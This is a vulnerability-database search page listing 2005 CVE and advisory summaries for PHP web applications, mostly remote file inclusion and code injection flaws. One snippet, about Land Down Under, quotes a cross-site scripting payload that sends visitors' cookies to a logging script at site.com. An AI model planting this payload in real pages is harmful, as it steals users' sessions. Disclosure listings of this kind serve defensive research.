7187 matches found

UbuntuCve
added 2005/08/29 8:14 p.m., 27 views

CVE-2005-2717

PHP remote file inclusion vulnerability in WebCalendar before 1.0.1 allows remote attackers to execute arbitrary PHP code when opening settings.php, possibly via sendreminders.php or other scripts...

7.5 CVSS, 6.3 AI score, 0.01495 EPSS
Exploits 0, References 1

Cvelist
added 2005/08/29 4:0 a.m., 14 views

CVE-2005-2717

PHP remote file inclusion vulnerability in WebCalendar before 1.0.1 allows remote attackers to execute arbitrary PHP code when opening settings.php, possibly via sendreminders.php or other scripts...

7.3 AI score, 0.01495 EPSS
Exploits 0, References 8

securityvulns
added 2005/08/29 12:0 a.m., 28 views

Land Down Under

Bug finder:spyMASter Web site:Realhackers.net Contact:[email protected] LDU has some xss vulns Firstly you can use html codes in your signature you can get cookies with this put your signature that code SCRIPT location.href='http://site.com/log/ekle.php?c='+escapedocument. cookie/SCRIPT an...

Exploits 0

Tenable Nessus
added 2005/08/29 12:0 a.m., 712 views

AutoLinks Pro 'al_initialize.php' alpath Parameter Remote File Inclusion

The remote host is running AutoLinks Pro, a commercial link management package. The version of AutoLinks Pro installed on the remote host allows attackers to control the 'alpath' parameter used when including PHP code in the 'al_initialize.php' script. By leveraging this flaw, an unauthenticated...

7.5 CVSS, 6 AI score, 0.01116 EPSS
Exploits 1, References 1

Cvelist
added 2005/08/25 4:0 a.m., 14 views

CVE-2005-2699

Unrestricted file upload vulnerability in admin/admin.php in PHPKit 1.6.1 allows remote authenticated administrators to execute arbitrary PHP code by uploading a .php file to the content/images/ directory using images.php. NOTE: if a PHPKit administrator must already have access to the end system...

7.2 AI score, 0.00151 EPSS
Exploits 0, References 1

Cvelist
added 2005/08/24 4:0 a.m., 14 views

CVE-2005-2685

SaveWebPortal 3.4 allows remote attackers to execute arbitrary PHP code via a direct request to admin/PhpMyExplorer/editerfichier.php, then editing the desired file to contain the PHP code, as demonstrated using header.php in the fichier parameter. NOTE: it is possible that this vulnerability ste...

7.7 AI score, 0.00784 EPSS
Exploits 1, References 2

NVD
added 2005/08/24 4:0 a.m., 14 views

CVE-2005-2687

PHP remote file inclusion vulnerability in SaveWebPortal 3.4 allows remote attackers to execute arbitrary PHP code via the (1) SITEPath parameter to menudx.php or (2) CONTENTSDir parameter to menusx.php...

7.5 CVSS, 7.5 AI score, 0.01015 EPSS
Exploits 1, References 3

Packet Storm
added 2005/08/24 12:0 a.m., 22 views

phpkit161.txt

SQL Injection and PHP Code Injection Vulnerabilities in PHPKit 1.6.1 Version: PHPKit 1.6.1 Risk: High if magic_quotes_gpc = Off URL: http://www.phpkit.com SQL Injection in include.php?path=login/member.php The parameters usernick and letters are vulnerable to SQL Injections. POC:...

7.4 AI score
Exploits 0

securityvulns
added 2005/08/23 12:0 a.m., 28 views

SQL Injection and PHP Code Injection Vulnerabilities in PHPKit 1.6.1

SQL Injection and PHP Code Injection Vulnerabilities in PHPKit 1.6.1 Version: PHPKit 1.6.1 Risk: High if magic_quotes_gpc = Off URL: http://www.phpkit.com SQL Injection in include.php?path=login/member.php The parameters usernick and letters are vulnerable to SQL Injections. POC:...

0.7 AI score
Exploits 0

securityvulns
added 2005/08/19 12:0 a.m., 21 views

[SA16475] LiveSupport PEAR XML_RPC Nested XML Tags PHP Code Execution

0.3 AI score
Exploits 0

CVE
added 2005/08/17 4:0 a.m., 58 views

CVE-2005-2612

The CVE covers a direct code injection vulnerability in WordPress 1.5.1.3 and earlier that allows remote attackers to execute arbitrary PHP code via the cache_lastpostdate[server] cookie. Affected software is WordPress (versions prior to 1.5.1.3). Root cause is improper handling of the cache_last...

7.5 CVSS, 7.7 AI score, 0.73416 EPSS
Exploits 5, References 2, Affected Software 1

OSV
added 2005/08/17 4:0 a.m., 5 views

CVE-2005-2612

Direct code injection vulnerability in WordPress 1.5.1.3 and earlier allows remote attackers to execute arbitrary PHP code via the cache_lastpostdate[server] cookie...

7.6 AI score
Exploits 0, References 2

NVD
added 2005/08/17 4:0 a.m., 12 views

CVE-2005-2612

Direct code injection vulnerability in WordPress 1.5.1.3 and earlier allows remote attackers to execute arbitrary PHP code via the cache_lastpostdate[server] cookie...

7.5 CVSS, 7.7 AI score, 0.73416 EPSS
Exploits 5, References 2

CVE
added 2005/08/16 4:0 a.m., 41 views

CVE-2005-2567

CVE-2005-2567 affects SysCP 1.2.10 and earlier. The vulnerability is a PHP remote file inclusion via the language parameter, enabling an attacker to execute arbitrary PHP code on the server. The issue is documented in the CVE entry and corroborated by related advisories; no explicit exploit detai...

7.5 CVSS, 7.7 AI score, 0.00717 EPSS
Exploits 0, References 3, Affected Software 1

CVE
added 2005/08/16 4:0 a.m., 46 views

CVE-2005-2571

FunkBoard 0.66CF (and possibly earlier) has an access-control flaw: the admin/mysql_install.php and admin/pg_install.php scripts are not properly restricted, allowing an attacker to obtain the database username and password or inject arbitrary PHP code into info.php. The issue is described as a l...

6.4 CVSS, 7.5 AI score, 0.00376 EPSS
Exploits 0, References 3, Affected Software 1

NVD
added 2005/08/16 4:0 a.m., 9 views

CVE-2005-2568

Eval injection vulnerability in the template engine for SysCP 1.2.10 and earlier allows remote attackers to execute arbitrary PHP code via a string containing the code within "{" and "}" curly bracket characters, which are processed by the PHP eval function...

7.5 CVSS, 7.7 AI score, 0.00717 EPSS
Exploits 0, References 3

Cvelist
added 2005/08/16 4:0 a.m., 19 views

CVE-2005-2568

Eval injection vulnerability in the template engine for SysCP 1.2.10 and earlier allows remote attackers to execute arbitrary PHP code via a string containing the code within "{" and "}" curly bracket characters, which are processed by the PHP eval function...

7.7 AI score, 0.00717 EPSS
Exploits 0, References 3

NVD
added 2005/08/16 4:0 a.m., 9 views

CVE-2005-2567

PHP remote file inclusion vulnerability in SysCP 1.2.10 and earlier allows remote attackers to execute arbitrary PHP code via the language parameter...

7.5 CVSS, 7.6 AI score, 0.00717 EPSS
Exploits 0, References 3

NVD
added 2005/08/16 4:0 a.m., 10 views

CVE-2005-2571

FunkBoard 0.66CF, and possibly earlier versions, does not properly restrict access to the (1) admin/mysql_install.php and (2) admin/pg_install.php scripts, which allows attackers to obtain the database username and password or inject arbitrary PHP code into info.php...

6.4 CVSS, 7.1 AI score, 0.00376 EPSS
Exploits 0, References 3

securityvulns
added 2005/08/15 12:0 a.m., 45 views

[Full-disclosure] [DRUPAL-SA-2005-004] Drupal 4.6.3 / 4.5.5 fixes critical XML-RPC issue

Drupal security advisory DRUPAL-SA-2005-004 Advisory ID: DRUPAL-SA-2005-004 Date: 2005-aug-15 CVE ID: CAN-2005-2498 Security risk: highly...

5 CVSS, 9.3 AI score, 0.04688 EPSS
Exploits 5